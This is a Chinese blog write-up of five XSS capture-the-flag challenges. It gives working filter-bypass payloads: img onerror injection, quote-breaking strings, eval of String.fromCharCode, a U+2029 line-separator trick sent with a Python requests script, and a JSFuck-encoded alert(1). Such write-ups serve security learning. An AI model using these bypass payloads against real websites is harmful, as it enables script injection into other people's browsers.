H4rdy's blogs - 西南石油大学ctf xss题

xss_1

过滤了最常用的script标签,换用img

"><img src=1" onerror=alert(1)>

xss_2

根据输出点,先闭合if语句,在闭合后面的:)

构造语句

1");alert(1);("

xss_3

跟第二个有点像

'');var a='String.fro'; var b='mCharC'; var c='ode(97, 108, 101, 114, 116, 40, 49, 41)'; var d=a+b+c; eval(eval(d));(''

xss_4

感谢 fyth

在群里,有个伙伴做出来了,然后扔出payload

document.getElementsByName('data')[0].value=String.fromCharCode(0x2029)+"eval('al'+'ert')(1);"+String.fromCharCode(0x2029)

在控制台里运行把,把0x2029这个换行符回车写到data里面, 然后在提交。

在提交过程中抓包,可以看的更明白,

data=%E2%80%A9eval%28%27al%27%2B%27ert%27%29%281%29%3B%E2%80%A9

前面的%E2%80%A9就是回车。成功提交就alert(1)

思考:

document.getElementsByName('data')[0].value=String.fromCharCode(0x2029)+"eval('al'+'ert')(1);"+String.fromCharCode(0x2029)

0x1

是在开头和结尾都写个回车换行符,

去掉结尾点依然可以成功alert(1)

0x2

百度可知0x2029表示回车 or 段落分隔符

那么0x2028表示新行 or 行分隔符.

将0x2029换成0x2028依然能够成功

0x3

提交过程中抓包得到的

data=%E2%80%A9

在提交数据包时,burp拦截,将post数据十六进制改完E2 80 A9也成功换行

0x4

python写出

#!/usr/bin/env python
import requests
resp = requests.post("http://xss.swpuwllm.com/xss_4/",data={'data':u"\u2029eval('al'+'ert')(1)"})
a = resp.content
print a

可看到返回页面

0x5

fuzzing一下发现过滤来字母,但是{}!+这种没有过滤,立马想到jother编码,但是没成功,换成jsfuck编码,alert(1)编码后提交成功.jother和jsfuck有区别么?alert(1)经jsfuck编码后的字符量比jother编码少,why?

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
tagged by none  

Post a new comment

© H4rdy's blog